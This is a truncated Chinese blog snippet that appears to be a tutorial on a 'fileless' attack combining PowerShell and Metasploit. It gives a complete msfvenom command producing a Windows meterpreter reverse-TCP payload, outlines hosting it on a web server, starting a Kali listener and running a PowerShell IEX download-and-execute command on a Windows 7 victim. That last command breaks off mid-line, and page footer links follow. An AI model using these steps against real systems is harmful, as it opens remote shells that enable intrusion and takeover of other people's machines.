Powershell 配合msf無文件攻擊

生成木馬 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1121 -f psh-reflection >x.ps1 放到VPS上,這裏我們放到本機搭建的apache環境中 kali設置監聽,並且啓動 win7中訪問木馬是否成功 直接在win7的cmd中執行命令 powershell IEX (N
相關文章
相關標籤/搜索